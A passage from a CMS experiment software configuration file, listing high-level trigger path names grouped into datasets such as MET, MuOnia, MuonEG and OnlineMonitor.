'HLT_QuadPFJet103_88_75_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet103_88_75_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet103_88_75_15_v5',
'HLT_QuadPFJet105_88_76_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet105_88_76_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet105_88_76_15_v5',
'HLT_QuadPFJet111_90_80_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet111_90_80_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet111_90_80_15_v5',
'HLT_QuadPFJet98_83_71_15_DoublePFBTagDeepCSV_1p3_7p7_VBF1_v8',
'HLT_QuadPFJet98_83_71_15_PFBTagDeepCSV_1p3_VBF2_v8',
'HLT_QuadPFJet98_83_71_15_v5',
'HLT_Rsq0p35_v15',
'HLT_Rsq0p40_v15',
'HLT_RsqMR300_Rsq0p09_MR200_4jet_v15',
'HLT_RsqMR300_Rsq0p09_MR200_v15',
'HLT_RsqMR320_Rsq0p09_MR200_4jet_v15',
'HLT_RsqMR320_Rsq0p09_MR200_v15',
'HLT_SingleJet30_Mu12_SinglePFJet40_v11' ),
L1Accept = cms.vstring( 'DST_Physics_v7',
'DST_ZeroBias_v2' ),
MET = cms.vstring( 'HLT_CaloMET100_NotCleaned_v4',
'HLT_CaloMET110_NotCleaned_v4',
'HLT_CaloMET250_NotCleaned_v4',
'HLT_CaloMET300_NotCleaned_v4',
'HLT_CaloMET350_NotCleaned_v4',
'HLT_CaloMET80_NotCleaned_v4',
'HLT_CaloMET90_NotCleaned_v4',
'HLT_CaloMHT90_v4',
'HLT_DiJet110_35_Mjj650_PFMET110_v9',
'HLT_DiJet110_35_Mjj650_PFMET120_v9',
'HLT_DiJet110_35_Mjj650_PFMET130_v9',
'HLT_L1ETMHadSeeds_v2',
'HLT_MET105_IsoTrk50_v9',
'HLT_MET120_IsoTrk50_v9',
'HLT_MonoCentralPFJet80_PFMETNoMu110_PFMHTNoMu110_IDTight_v20',
'HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight_v20',
'HLT_MonoCentralPFJet80_PFMETNoMu130_PFMHTNoMu130_IDTight_v19',
'HLT_MonoCentralPFJet80_PFMETNoMu140_PFMHTNoMu140_IDTight_v19',
'HLT_PFMET100_PFMHT100_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET100_PFMHT100_IDTight_PFHT60_v9',
'HLT_PFMET110_PFMHT110_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET110_PFMHT110_IDTight_v20',
'HLT_PFMET120_PFMHT120_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET120_PFMHT120_IDTight_PFHT60_v9',
'HLT_PFMET120_PFMHT120_IDTight_v20',
'HLT_PFMET130_PFMHT130_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET130_PFMHT130_IDTight_v20',
'HLT_PFMET140_PFMHT140_IDTight_CaloBTagDeepCSV_3p1_v8',
'HLT_PFMET140_PFMHT140_IDTight_v20',
'HLT_PFMET200_BeamHaloCleaned_v9',
'HLT_PFMET200_NotCleaned_v9',
'HLT_PFMET250_NotCleaned_v9',
'HLT_PFMET300_NotCleaned_v9',
'HLT_PFMETNoMu100_PFMHTNoMu100_IDTight_PFHT60_v9',
'HLT_PFMETNoMu110_PFMHTNoMu110_IDTight_v20',
'HLT_PFMETNoMu120_PFMHTNoMu120_IDTight_PFHT60_v9',
'HLT_PFMETNoMu120_PFMHTNoMu120_IDTight_v20',
'HLT_PFMETNoMu130_PFMHTNoMu130_IDTight_v19',
'HLT_PFMETNoMu140_PFMHTNoMu140_IDTight_v19',
'HLT_PFMETTypeOne100_PFMHT100_IDTight_PFHT60_v9',
'HLT_PFMETTypeOne110_PFMHT110_IDTight_v12',
'HLT_PFMETTypeOne120_PFMHT120_IDTight_PFHT60_v9',
'HLT_PFMETTypeOne120_PFMHT120_IDTight_v12',
'HLT_PFMETTypeOne130_PFMHT130_IDTight_v12',
'HLT_PFMETTypeOne140_PFMHT140_IDTight_v11',
'HLT_PFMETTypeOne200_BeamHaloCleaned_v9',
'HLT_TripleJet110_35_35_Mjj650_PFMET110_v9',
'HLT_TripleJet110_35_35_Mjj650_PFMET120_v9',
'HLT_TripleJet110_35_35_Mjj650_PFMET130_v9' ),
MonteCarlo = cms.vstring( 'MC_AK4CaloJetsFromPV_v8',
'MC_AK4CaloJets_v9',
'MC_AK4PFJets_v17',
'MC_AK8CaloHT_v8',
'MC_AK8PFHT_v16',
'MC_AK8PFJets_v17',
'MC_AK8TrimPFJets_v17',
'MC_CaloBTagDeepCSV_v8',
'MC_CaloHT_v8',
'MC_CaloMET_JetIdCleaned_v9',
'MC_CaloMET_v8',
'MC_CaloMHT_v8',
'MC_Diphoton10_10_R9Id_OR_IsoCaloId_AND_HE_R9Id_Mass10_v13',
'MC_DoubleEle5_CaloIdL_MW_v15',
'MC_DoubleMuNoFiltersNoVtx_v7',
'MC_DoubleMu_TrkIsoVVL_DZ_v11',
'MC_Ele15_Ele10_CaloIdL_TrackIdL_IsoVL_DZ_v15',
'MC_Ele5_WPTight_Gsf_v8',
'MC_IsoMu_v15',
'MC_PFBTagDeepCSV_v10',
'MC_PFHT_v16',
'MC_PFMET_v17',
'MC_PFMHT_v16',
'MC_ReducedIterativeTracking_v12' ),
MuOnia = cms.vstring( 'HLT_Dimuon0_Upsilon_L1_4p5NoOS_v8',
'HLT_Dimuon0_Upsilon_L1_4p5_v9',
'HLT_Dimuon0_Upsilon_L1_4p5er2p0M_v7',
'HLT_Dimuon0_Upsilon_L1_4p5er2p0_v9',
'HLT_Dimuon0_Upsilon_L1_5M_v8',
'HLT_Dimuon0_Upsilon_L1_5_v9',
'HLT_Dimuon0_Upsilon_Muon_L1_TM0_v6',
'HLT_Dimuon0_Upsilon_Muon_NoL1Mass_v6',
'HLT_Dimuon0_Upsilon_NoVertexing_v7',
'HLT_Dimuon12_Upsilon_y1p4_v2',
'HLT_Dimuon14_Phi_Barrel_Seagulls_v7',
'HLT_Dimuon24_Phi_noCorrL1_v6',
'HLT_Dimuon24_Upsilon_noCorrL1_v6',
'HLT_DoubleMu3_DoubleEle7p5_CaloIdL_TrackIdL_Upsilon_v4',
'HLT_DoubleMu5_Upsilon_DoubleEle3_CaloIdL_TrackIdL_v4',
'HLT_Mu20_TkMu0_Phi_v8',
'HLT_Mu25_TkMu0_Onia_v8',
'HLT_Mu25_TkMu0_Phi_v8',
'HLT_Mu30_TkMu0_Upsilon_v1',
'HLT_Mu7p5_L2Mu2_Upsilon_v10',
'HLT_Mu7p5_Track2_Upsilon_v11',
'HLT_Mu7p5_Track3p5_Upsilon_v11',
'HLT_Mu7p5_Track7_Upsilon_v11',
'HLT_Trimuon5_3p5_2_Upsilon_Muon_v5',
'HLT_TrimuonOpen_5_3p5_2_Upsilon_Muon_v3' ),
MuonEG = cms.vstring( 'HLT_DiMu4_Ele9_CaloIdL_TrackIdL_DZ_Mass3p8_v17',
'HLT_DiMu9_Ele9_CaloIdL_TrackIdL_DZ_v17',
'HLT_DiMu9_Ele9_CaloIdL_TrackIdL_v17',
'HLT_DoubleMu20_7_Mass0to30_L1_DM4EG_v8',
'HLT_DoubleMu20_7_Mass0to30_L1_DM4_v7',
'HLT_DoubleMu20_7_Mass0to30_Photon23_v8',
'HLT_Mu12_DoublePhoton20_v5',
'HLT_Mu12_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_v15',
'HLT_Mu12_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_v7',
'HLT_Mu17_Photon30_IsoCaloId_v6',
'HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v15',
'HLT_Mu23_TrkIsoVVL_Ele12_CaloIdL_TrackIdL_IsoVL_v7',
'HLT_Mu27_Ele37_CaloIdL_MW_v5',
'HLT_Mu37_Ele27_CaloIdL_MW_v5',
'HLT_Mu38NoFiltersNoVtxDisplaced_Photon38_CaloIdL_v1',
'HLT_Mu43NoFiltersNoVtxDisplaced_Photon43_CaloIdL_v1',
'HLT_Mu43NoFiltersNoVtx_Photon43_CaloIdL_v5',
'HLT_Mu48NoFiltersNoVtx_Photon48_CaloIdL_v5',
'HLT_Mu8_DiEle12_CaloIdL_TrackIdL_DZ_v18',
'HLT_Mu8_DiEle12_CaloIdL_TrackIdL_v18',
'HLT_Mu8_Ele8_CaloIdM_TrackIdM_Mass8_PFHT350_DZ_v19',
'HLT_Mu8_Ele8_CaloIdM_TrackIdM_Mass8_PFHT350_v19',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_CaloDiJet30_CaloBtagDeepCSV_1p5_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_CaloDiJet30_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_PFDiJet30_PFBtagDeepCSV_1p5_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_PFDiJet30_v1',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_DZ_v13',
'HLT_Mu8_TrkIsoVVL_Ele23_CaloIdL_TrackIdL_IsoVL_v11' ),
NoBPTX = cms.vstring( 'HLT_CDC_L2cosmic_10_er1p0_v1',
'HLT_CDC_L2cosmic_5p5_er1p0_v1',
'HLT_L2Mu10_NoVertex_NoBPTX3BX_v5',
'HLT_L2Mu10_NoVertex_NoBPTX_v6',
'HLT_L2Mu40_NoVertex_3Sta_NoBPTX3BX_v5',
'HLT_L2Mu45_NoVertex_3Sta_NoBPTX3BX_v4',
'HLT_UncorrectedJetE30_NoBPTX3BX_v6',
'HLT_UncorrectedJetE30_NoBPTX_v6',
'HLT_UncorrectedJetE60_NoBPTX3BX_v6',
'HLT_UncorrectedJetE70_NoBPTX3BX_v6' ),
OnlineMonitor = ( cms.vstring( 'HLT_AK4CaloJet100_v10',
'HLT_AK4CaloJet120_v9',
'HLT_AK4CaloJet30_v11',
'HLT_AK4CaloJet40_v10',
'HLT_AK4CaloJet50_v10',
'HLT_AK4CaloJet80_v10',
'HLT_AK4PFJet100_v19',
'HLT_AK4PFJet120_v18',
'HLT_AK4PFJet30_v19',
'HLT_AK4PFJet50_v19',
'HLT_AK4PFJet80_v19',
'HLT_AK8PFHT750_TrimMass50_v12',
'HLT_AK8PFHT800_TrimMass50_v12',
'HLT_AK8PFHT850_TrimMass50_v11',
'HLT_AK8PFHT900_TrimMass50_v11',
'HLT_AK8PFJet140_v15',
'HLT_AK8PFJet15_v3',
'HLT_AK8PFJet200_v15',
'HLT_AK8PFJet25_v3',
'HLT_AK8PFJet260_v16',
'HLT_AK8PFJet320_v16',
'HLT_AK8PFJet330_TrimMass30_PFAK8BTagDeepCSV_p17_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BTagDeepCSV_p1_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BoostedDoubleB_np2_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BoostedDoubleB_np4_v2',
'HLT_AK8PFJet330_TrimMass30_PFAK8BoostedDoubleB_p02_v3',
'HLT_AK8PFJet360_TrimMass30_v18',
'HLT_AK8PFJet380_TrimMass30_v11',
'HLT_AK8PFJet400_TrimMass30_v12',
'HLT_AK8PFJet400_v16',
'HLT_AK8PFJet40_v16',
'HLT_AK8PFJet420_TrimMass30_v11',
'HLT_AK8PFJet450_v16',
'HLT_AK8PFJet500_v16',
'HLT_AK8PFJet550_v11',
'HLT_AK8PFJet60_v15',
'HLT_AK8PFJet80_v15',
'HLT_AK8PFJetFwd140_v14',
'HLT_AK8PFJetFwd15_v3',
'HLT_AK8PFJetFwd200_v14',
'HLT_AK8PFJetFwd25_v3',
'HLT_AK8PFJetFwd260_v15',
'HLT_AK8PFJetFwd320_v15',
'HLT_AK8PFJetFwd400_v15',
'HLT_AK8PFJetFwd40_v15',
'HLT_AK8PFJetFwd450_v15',
'HLT_AK8PFJetFwd500_v15',
'HLT_AK8PFJetFwd60_v14',
'HLT_AK8PFJetFwd80_v14',
'HLT_BTagMu_AK4DiJet110_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet110_Mu5_v13',
'HLT_BTagMu_AK4DiJet170_Mu5_noalgo_v12',
'HLT_BTagMu_AK4DiJet170_Mu5_v12',
'HLT_BTagMu_AK4DiJet20_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet20_Mu5_v13',
'HLT_BTagMu_AK4DiJet40_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet40_Mu5_v13',
'HLT_BTagMu_AK4DiJet70_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet70_Mu5_v13',
'HLT_BTagMu_AK4Jet300_Mu5_noalgo_v12',
'HLT_BTagMu_AK4Jet300_Mu5_v12',
'HLT_BTagMu_AK8DiJet170_Mu5_noalgo_v9',
'HLT_BTagMu_AK8DiJet170_Mu5_v9',
'HLT_BTagMu_AK8Jet170_DoubleMu5_noalgo_v2',
'HLT_BTagMu_AK8Jet170_DoubleMu5_v2',
'HLT_BTagMu_AK8Jet300_Mu5_noalgo_v12',
'HLT_BTagMu_AK8Jet300_Mu5_v12',
'HLT_CDC_L2cosmic_10_er1p0_v1',
'HLT_CDC_L2cosmic_5p5_er1p0_v1',
'HLT_CaloJet500_NoJetID_v12',
'HLT_CaloJet550_NoJetID_v7',
'HLT_CaloMET100_NotCleaned_v4',
'HLT_CaloMET110_NotCleaned_v4',
'HLT_CaloMET250_NotCleaned_v4',
'HLT_CaloMET300_NotCleaned_v4',
'HLT_CaloMET350_NotCleaned_v4',
'HLT_CaloMET80_NotCleaned_v4',
'HLT_CaloMET90_NotCleaned_v4',
'HLT_CaloMHT90_v4',
'HLT_DiEle27_WPTightCaloOnly_L1DoubleEG_v4',
'HLT_DiJet110_35_Mjj650_PFMET110_v9',
'HLT_DiJet110_35_Mjj650_PFMET120_v9',
'HLT_DiJet110_35_Mjj650_PFMET130_v9',
'HLT_DiMu4_Ele9_CaloIdL_TrackIdL_DZ_Mass3p8_v17',
'HLT_DiMu9_Ele9_CaloIdL_TrackIdL_DZ_v17',
'HLT_DiMu9_Ele9_CaloIdL_TrackIdL_v17',
'HLT_DiPFJet15_FBEta3_NoCaloMatched_v17',
'HLT_DiPFJet15_NoCaloMatched_v16',
'HLT_DiPFJet25_FBEta3_NoCaloMatched_v17',
'HLT_DiPFJet25_NoCaloMatched_v16',
'HLT_DiPFJetAve100_HFJEC_v16',
'HLT_DiPFJetAve140_v13',
'HLT_DiPFJetAve15_HFJEC_v17',
'HLT_DiPFJetAve160_HFJEC_v16',
'HLT_DiPFJetAve200_v13',
'HLT_DiPFJetAve220_HFJEC_v16',
'HLT_DiPFJetAve25_HFJEC_v17',
'HLT_DiPFJetAve260_v14',
'HLT_DiPFJetAve300_HFJEC_v16',
'HLT_DiPFJetAve320_v14',
'HLT_DiPFJetAve35_HFJEC_v17',
'HLT_DiPFJetAve400_v14',
'HLT_DiPFJetAve40_v14',
'HLT_DiPFJetAve500_v14',
'HLT_DiPFJetAve60_HFJEC_v15',
'HLT_DiPFJetAve60_v14',
'HLT_DiPFJetAve80_HFJEC_v16',
'HLT_DiPFJetAve80_v13',
'HLT_DiSC30_18_EIso_AND_HE_Mass70_v13',
'HLT_Dimuon0_Jpsi3p5_Muon2_v5',
'HLT_Dimuon0_Jpsi_L1_4R_0er1p5R_v7',
'HLT_Dimuon0_Jpsi_L1_NoOS_v7',
'HLT_Dimuon0_Jpsi_NoVertexing_L1_4R_0er1p5R_v7',
'HLT_Dimuon0_Jpsi_NoVertexing_NoOS_v7',
'HLT_Dimuon0_Jpsi_NoVertexing_v8',
'HLT_Dimuon0_Jpsi_v8',
'HLT_Dimuon0_LowMass_L1_0er1p5R_v7',
'HLT_Dimuon0_LowMass_L1_0er1p5_v8',
'HLT_Dimuon0_LowMass_L1_4R_v7',
'HLT_Dimuon0_LowMass_L1_4_v8',
'HLT_Dimuon0_LowMass_L1_TM530_v6',
'HLT_Dimuon0_LowMass_v8',
'HLT_Dimuon0_Upsilon_L1_4p5NoOS_v8',
'HLT_Dimuon0_Upsilon_L1_4p5_v9',
'HLT_Dimuon0_Upsilon_L1_4p5er2p0M_v7',
'HLT_Dimuon0_Upsilon_L1_4p5er2p0_v9',
'HLT_Dimuon0_Upsilon_L1_5M_v8',
'HLT_Dimuon0_Upsilon_L1_5_v9',
'HLT_Dimuon0_Upsilon_Muon_L1_TM0_v6',
'HLT_Dimuon0_Upsilon_Muon_NoL1Mass_v6',
'HLT_Dimuon0_Upsilon_NoVertexing_v7',
'HLT_Dimuon10_PsiPrime_Barrel_Seagulls_v7',
'HLT_Dimuon12_Upsilon_y1p4_v2',
'HLT_Dimuon14_Phi_Barrel_Seagulls_v7',
'HLT_Dimuon18_PsiPrime_noCorrL1_v6',
'HLT_Dimuon18_PsiPrime_v14',
'HLT_Dimuon20_Jpsi_Barrel_Seagulls_v7',
'HLT_Dimuon24_Phi_noCorrL1_v6',
'HLT_Dimuon24_Upsilon_noCorrL1_v6',
'HLT_Dimuon25_Jpsi_noCorrL1_v6',
'HLT_Dimuon25_Jpsi_v14',
'HLT_Diphoton30PV_18PV_R9Id_AND_IsoCaloId_AND_HE_R9Id_NoPixelVeto_Mass55_v13',
'HLT_Diphoton30PV_18PV_R9Id_AND_IsoCaloId_AND_HE_R9Id_PixelVeto_Mass55_v15',
'HLT_Diphoton30_18_R9IdL_AND_HE_AND_IsoCaloId_NoPixelVeto_Mass55_v2',
'HLT_Diphoton30_18_R9IdL_AND_HE_AND_IsoCaloId_NoPixelVeto_v2',
'HLT_Diphoton30_22_R9Id_OR_IsoCaloId_AND_HE_R9Id_Mass90_v13',
'HLT_Diphoton30_22_R9Id_OR_IsoCaloId_AND_HE_R9Id_Mass95_v13',
'HLT_DoubleEle25_CaloIdL_MW_v4',
'HLT_DoubleEle27_CaloIdL_MW_v4',
'HLT_DoubleEle33_CaloIdL_MW_v17',
'HLT_DoubleEle8_CaloIdM_TrackIdM_Mass8_DZ_PFHT350_v20',
'HLT_DoubleEle8_CaloIdM_TrackIdM_Mass8_PFHT350_v20',
'HLT_DoubleL2Mu23NoVtx_2Cha_CosmicSeed_NoL2Matched_v2',
'HLT_DoubleL2Mu23NoVtx_2Cha_CosmicSeed_v2',
'HLT_DoubleL2Mu23NoVtx_2Cha_NoL2Matched_v2',
'HLT_DoubleL2Mu23NoVtx_2Cha_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_CosmicSeed_Eta2p4_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_CosmicSeed_NoL2Matched_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_CosmicSeed_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_Eta2p4_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_NoL2Matched_v2',
'HLT_DoubleL2Mu25NoVtx_2Cha_v2',
'HLT_DoubleL2Mu30NoVtx_2Cha_CosmicSeed_Eta2p4_v2',
'HLT_DoubleL2Mu30NoVtx_2Cha_Eta2p4_v2',
'HLT_DoubleL2Mu50_v2',
'HLT_DoubleMediumChargedIsoPFTauHPS30_L1MaxMass_Trk1_eta2p1_Reg_v1',
'HLT_DoubleMediumChargedIsoPFTauHPS35_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleMediumChargedIsoPFTauHPS35_Trk1_eta2p1_Reg_v4',
'HLT_DoubleMediumChargedIsoPFTauHPS40_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleMediumChargedIsoPFTauHPS40_Trk1_eta2p1_Reg_v1',
'HLT_DoubleMu20_7_Mass0to30_L1_DM4EG_v8',
'HLT_DoubleMu20_7_Mass0to30_L1_DM4_v7',
'HLT_DoubleMu20_7_Mass0to30_Photon23_v8',
'HLT_DoubleMu2_Jpsi_DoubleTkMu0_Phi_v5',
'HLT_DoubleMu2_Jpsi_DoubleTrk1_Phi1p05_v6',
'HLT_DoubleMu33NoFiltersNoVtxDisplaced_v1',
'HLT_DoubleMu3_DCA_PFMET50_PFMHT60_v10',
'HLT_DoubleMu3_DZ_PFMET50_PFMHT60_v10',
'HLT_DoubleMu3_DZ_PFMET70_PFMHT70_v10',
'HLT_DoubleMu3_DZ_PFMET90_PFMHT90_v10',
'HLT_DoubleMu3_DoubleEle7p5_CaloIdL_TrackIdL_Upsilon_v4',
'HLT_DoubleMu3_TkMu_DsTau3Mu_v4',
'HLT_DoubleMu3_Trk_Tau3mu_NoL1Mass_v6',
'HLT_DoubleMu3_Trk_Tau3mu_v12',
'HLT_DoubleMu40NoFiltersNoVtxDisplaced_v1',
'HLT_DoubleMu43NoFiltersNoVtx_v4',
'HLT_DoubleMu48NoFiltersNoVtx_v4',
'HLT_DoubleMu4_3_Bs_v14',
'HLT_DoubleMu4_3_Jpsi_v2',
'HLT_DoubleMu4_JpsiTrkTrk_Displaced_v7',
'HLT_DoubleMu4_JpsiTrk_Displaced_v15',
'HLT_DoubleMu4_Jpsi_Displaced_v7',
'HLT_DoubleMu4_Jpsi_NoVertexing_v7',
'HLT_DoubleMu4_LowMassNonResonantTrk_Displaced_v15',
'HLT_DoubleMu4_Mass3p8_DZ_PFHT350_v8',
'HLT_DoubleMu4_PsiPrimeTrk_Displaced_v15',
'HLT_DoubleMu5_Upsilon_DoubleEle3_CaloIdL_TrackIdL_v4',
'HLT_DoublePFJets100_CaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets116MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets128MaxDeta1p6_DoubleCaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets200_CaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets350_CaloBTagDeepCSV_p71_v2',
'HLT_DoublePFJets40_CaloBTagDeepCSV_p71_v2',
'HLT_DoublePhoton33_CaloIdL_v6',
'HLT_DoublePhoton70_v6',
'HLT_DoublePhoton85_v14',
'HLT_DoubleTightChargedIsoPFTauHPS35_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleTightChargedIsoPFTauHPS35_Trk1_eta2p1_Reg_v1',
'HLT_DoubleTightChargedIsoPFTauHPS40_Trk1_TightID_eta2p1_Reg_v1',
'HLT_DoubleTightChargedIsoPFTauHPS40_Trk1_eta2p1_Reg_v1',
'HLT_ECALHT800_v10',
'HLT_Ele115_CaloIdVT_GsfTrkIdT_v14',
'HLT_Ele12_CaloIdL_TrackIdL_IsoVL_PFJet30_v18',
'HLT_Ele135_CaloIdVT_GsfTrkIdT_v7',
'HLT_Ele145_CaloIdVT_GsfTrkIdT_v8',
'HLT_Ele15_CaloIdL_TrackIdL_IsoVL_PFJet30_v3',
'HLT_Ele15_Ele8_CaloIdL_TrackIdL_IsoVL_v3',
'HLT_Ele15_IsoVVVL_PFHT450_CaloBTagDeepCSV_4p5_v8',
'HLT_Ele15_IsoVVVL_PFHT450_PFMET50_v16',
'HLT_Ele15_IsoVVVL_PFHT450_v16',
'HLT_Ele15_IsoVVVL_PFHT600_v20',
'HLT_Ele15_WPLoose_Gsf_v3',
'HLT_Ele16_Ele12_Ele8_CaloIdL_TrackIdL_v9',
'HLT_Ele17_CaloIdM_TrackIdM_PFJet30_v16',
'HLT_Ele17_WPLoose_Gsf_v3',
'HLT_Ele200_CaloIdVT_GsfTrkIdT_v8',
'HLT_Ele20_WPLoose_Gsf_v6',
'HLT_Ele20_WPTight_Gsf_v6',
'HLT_Ele20_eta2p1_WPLoose_Gsf_v6',
'HLT_Ele23_CaloIdL_TrackIdL_IsoVL_PFJet30_v18',
'HLT_Ele23_CaloIdM_TrackIdM_PFJet30_v18',
'HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_DZ_v19',
'HLT_Ele23_Ele12_CaloIdL_TrackIdL_IsoVL_v19',
'HLT_Ele24_eta2p1_WPTight_Gsf_LooseChargedIsoPFTauHPS30_eta2p1_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_LooseChargedIsoPFTauHPS30_eta2p1_TightID_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_MediumChargedIsoPFTauHPS30_eta2p1_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_MediumChargedIsoPFTauHPS30_eta2p1_TightID_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_TightChargedIsoPFTauHPS30_eta2p1_CrossL1_v1',
'HLT_Ele24_eta2p1_WPTight_Gsf_TightChargedIsoPFTauHPS30_eta2p1_TightID_CrossL1_v1',
'HLT_Ele250_CaloIdVT_GsfTrkIdT_v13',
'HLT_Ele27_Ele37_CaloIdL_MW_v4',
'HLT_Ele27_WPTight_Gsf_v16',
'HLT_Ele28_HighEta_SC20_Mass55_v13',
'HLT_Ele28_WPTight_Gsf_v1',
'HLT_Ele28_eta2p1_WPTight_Gsf_HT150_v13',
'HLT_Ele300_CaloIdVT_GsfTrkIdT_v13',
'HLT_Ele30_WPTight_Gsf_v1',
'HLT_Ele30_eta2p1_WPTight_Gsf_CentralPFJet35_EleCleaned_v13',
'HLT_Ele32_WPTight_Gsf_L1DoubleEG_v9',
'HLT_Ele32_WPTight_Gsf_v15',
'HLT_Ele35_WPTight_Gsf_L1EGMT_v5',
'HLT_Ele35_WPTight_Gsf_v9',
'HLT_Ele38_WPTight_Gsf_v9',
'HLT_Ele40_WPTight_Gsf_v9',
'HLT_Ele50_CaloIdVT_GsfTrkIdT_PFJet165_v18')+cms.vstring( 'HLT_Ele50_IsoVVVL_PFHT450_v16',
'HLT_Ele8_CaloIdL_TrackIdL_IsoVL_PFJet30_v16',
'HLT_Ele8_CaloIdM_TrackIdM_PFJet30_v18',
'HLT_HT400_DisplacedDijet40_DisplacedTrack_v13',
'HLT_HT425_v9',
'HLT_HT430_DisplacedDijet40_DisplacedTrack_v13',
'HLT_HT430_DisplacedDijet60_DisplacedTrack_v13',
'HLT_HT500_DisplacedDijet40_DisplacedTrack_v13',
'HLT_HT550_DisplacedDijet60_Inclusive_v13',
'HLT_HT650_DisplacedDijet60_Inclusive_v13',
'HLT_HcalIsolatedbunch_v5',
'HLT_HcalNZS_v13',
'HLT_HcalPhiSym_v15',
'HLT_IsoMu20_eta2p1_LooseChargedIsoPFTauHPS27_eta2p1_CrossL1_v4',
'HLT_IsoMu20_eta2p1_LooseChargedIsoPFTauHPS27_eta2p1_TightID_CrossL1_v1',
'HLT_IsoMu20_eta2p1_MediumChargedIsoPFTauHPS27_eta2p1_CrossL1_v1',
'HLT_IsoMu20_eta2p1_MediumChargedIsoPFTauHPS27_eta2p1_TightID_CrossL1_v1',
'HLT_IsoMu20_eta2p1_TightChargedIsoPFTauHPS27_eta2p1_CrossL1_v1',
'HLT_IsoMu20_eta2p1_TightChargedIsoPFTauHPS27_eta2p1_TightID_CrossL1_v1',
'HLT_IsoMu20_v15',
'HLT_IsoMu24_TwoProngs35_v1',
'HLT_IsoMu24_eta2p1_v15',
'HLT_IsoMu24_v13',
'HLT_IsoMu27_v16',
'HLT_IsoMu30_v4',
'HLT_IsoTrackHB_v4',
'HLT_IsoTrackHE_v4',
'HLT_L1ETMHadSeeds_v2',
'HLT_L1NotBptxOR_v3',
'HLT_L1SingleMu18_v3',
'HLT_L1SingleMu25_v2',
'HLT_L1SingleMuCosmics_v1',
'HLT_L1UnpairedBunchBptxMinus_v2',
'HLT_L1UnpairedBunchBptxPlus_v2',
'HLT_L1_CDC_SingleMu_3_er1p2_TOP120_DPHI2p618_3p142_v2',
'HLT_L2Mu10_NoVertex_NoBPTX3BX_v5',
'HLT_L2Mu10_NoVertex_NoBPTX_v6',
'HLT_L2Mu10_v7',
'HLT_L2Mu40_NoVertex_3Sta_NoBPTX3BX_v5',
'HLT_L2Mu45_NoVertex_3Sta_NoBPTX3BX_v4',
'HLT_L2Mu50_v2',
'HLT_MET105_IsoTrk50_v9',
'HLT_MET120_IsoTrk50_v9',
'HLT_MediumChargedIsoPFTau180HighPtRelaxedIso_Trk50_eta2p1_1pr_v11',
'HLT_MediumChargedIsoPFTau180HighPtRelaxedIso_Trk50_eta2p1_v12',
'HLT_MediumChargedIsoPFTau200HighPtRelaxedIso_Trk50_eta2p1_v12',
'HLT_MediumChargedIsoPFTau220HighPtRelaxedIso_Trk50_eta2p1_v12',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET100_v12',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET110_v8',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET120_v8',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET130_v8',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET140_v3',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_MET90_v12',
'HLT_MediumChargedIsoPFTau50_Trk30_eta2p1_1pr_v12',
'HLT_MonoCentralPFJet80_PFMETNoMu110_PFMHTNoMu110_IDTight_v20',
'HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight_v20',
'HLT_MonoCentralPFJet80_PFMETNoMu130_PFMHTNoMu130_IDTight_v19',
'HLT_MonoCentralPFJet80_PFMETNoMu140_PFMHTNoMu140_IDTight_v19',
